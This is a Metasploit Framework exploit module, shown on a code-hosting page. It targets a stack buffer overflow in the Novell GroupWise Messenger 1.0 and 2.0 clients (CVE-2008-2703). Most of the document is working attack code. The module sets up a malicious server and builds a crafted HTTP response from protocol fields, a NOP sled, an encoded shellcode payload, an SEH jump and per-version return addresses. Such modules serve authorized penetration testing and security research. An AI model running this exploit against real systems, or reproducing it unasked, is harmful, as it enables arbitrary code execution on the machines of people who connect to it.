CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/novell/groupwisemessenger_client.rb
Views: 11623
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::TcpServer
10
11
def initialize(info = {})
12
super(update_info(info,
13
'Name' => 'Novell GroupWise Messenger Client Buffer Overflow',
14
'Description' => %q{
15
This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.
16
By sending a specially crafted HTTP response, an attacker may be able to execute
17
arbitrary code.
18
},
19
'Author' => 'MC',
20
'License' => MSF_LICENSE,
21
'References' =>
22
[
23
[ 'CVE', '2008-2703' ],
24
[ 'OSVDB', '46041' ],
25
[ 'BID', '29602' ],
26
[ 'URL', 'http://www.infobyte.com.ar/adv/ISR-17.html' ],
27
],
28
'DefaultOptions' =>
29
{
30
'EXITFUNC' => 'process',
31
'AllowWin32SEH' => true
32
},
33
'Payload' =>
34
{
35
'Space' => 750,
36
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
37
'DisableNops' => 'True',
38
'StackAdjustment' => -3500,
39
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
40
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
41
},
42
'Platform' => 'win',
43
'Targets' =>
44
[
45
[ 'Novell GroupWise Messenger 2.0 Client', { 'Ret' => 0x502de115 } ],
46
[ 'Novell GroupWise Messenger 1.0 Client', { 'Ret' => 0x1000e105 } ],
47
],
48
'Privileged' => false,
49
'DisclosureDate' => '2008-07-02',
50
'DefaultTarget' => 0))
51
52
register_options(
53
[
54
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 8300 ])
55
])
56
end
57
58
def on_client_connect(client)
59
return if ((p = regenerate_payload(client)) == nil)
60
61
client.get_once
62
63
date = Time.gm(2008,nil,nil,nil,nil,nil)
64
rand_1 = rand_text_english(5)
65
rand_2 = rand_text_english(4)
66
rand_3 = rand_text_english(rand(8) + 1)
67
rand_4 = rand_text_alpha_upper(8)
68
rand_5 = rand_text_english(3)
69
70
res = "HTTP/1.0 200\r\n"
71
res << "Date: #{date}\r\n"
72
res << "Pragma: no-cache\r\n"
73
res << "Cache-Control: no-cache\r\n\r\n"
74
res << "\n\0\20\0\0\0nnmFileTransfer\0\2\0\0\x000\0\n\0\t\0\0\0"
75
res << "nnmQuery\0\2\0\0\x001\0\n\0\13\0\0\0nnmArchive"
76
res << "\0\2\0\0\x001\0\n\0\24\0\0\0nnmPasswordRemember"
77
res << "\0\2\0\0\x001\0\n\0\17\0\0\0nnmMaxContacts"
78
res << "\0\4\0\0\x00150\0\n\0\16\0\0\0nnmMaxFolders"
79
res << "\0\3\0\0\x0050\0\n\0\r\0\0\0nnmBroadcast"
80
res << "\0\2\0\0\x001\0\n\0\23\0\0\0nnmPersonalHistory"
81
res << "\0\2\0\0\x001\0\n\0\r\0\0\0nnmPrintSave"
82
res << "\0\2\0\0\x001\0\n\0\17\0\0\0nnmChatService"
83
res << "\0\2\0\0\x001\0\n\0\3\0\0\0CN\0\a\0\0\0ISR000"
84
res << "\0\n\0\b\0\0\0Surname\0\6\0\0\0#{rand_1}\0\n\0\n\0\0\0"
85
res << "Full Name\0\20\0\0\0Client Name \0\n\0\13\0\0\0Given Name"
86
res << "\0\n\0\0\0Client \0\n\0\r\0\0\0nnmLastLogin\0\13\0\0\x001200112090\0\t\0\30\0\0\0"
87
res << "NM_A_FA_CLIENT_SETTINGS\0\1\0\0\0\n\0\21\0\0\0Novell.AskToSave"
88
res << "\0\2\0\0\x001\0\t\0\e\0\0\0NM_A_FA_INFO_DISPLAY_ARRAY"
89
res << "\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0#{rand_1}\@#{rand_4}.#{rand_5}.xx"
90
res << "\0\b\0\16\0\0\0NM_A_UD_BUILD\0\a\0\0\0\n\0\13\0\0\0NM_A_SZ_DN\x001\0\0\0"
91
res << "CN=ISR000,OU=IT,OU=ISR_,OU=BA,OU=AR,O=#{rand_4}XX"
92
res << "\0\t\0\24\0\0\0NM_A_FA_AU_SETTINGS\0\1\0\0\0\n\0\22\0\0\0"
93
res << "nnmClientDownload\0\2\0\0\x000\0\b\0\22\0\0\0NM_A_UD_KEEPALIVE"
94
res << "\0\n\0\0\0\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0"
95
res << "NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0"
96
97
res << "HTTP/1.0 200\r\n"
98
res << "Date: #{date}\r\n"
99
res << "Pragma: no-cache\r\n"
100
res << "Cache-Control: no-cache\r\n\r\n"
101
res << "\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0"
102
res << "NM_A_SZ_TRANSACTION_ID\0\2\0\0\x00#{rand_2}\0\0"
103
res << make_nops(805 - payload.encoded.length) + payload.encoded
104
res << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
105
res << [0xe9, -800].pack('CV') + rand_text_english(5000 - payload.encoded.length)
106
107
print_status("Sending #{self.name} to #{client.peerhost}:#{client.peerport}...")
108
client.put(res)
109
handler(client)
110
111
select(nil,nil,nil,2)
112
service.close_client(client)
113
end
114
end
115
116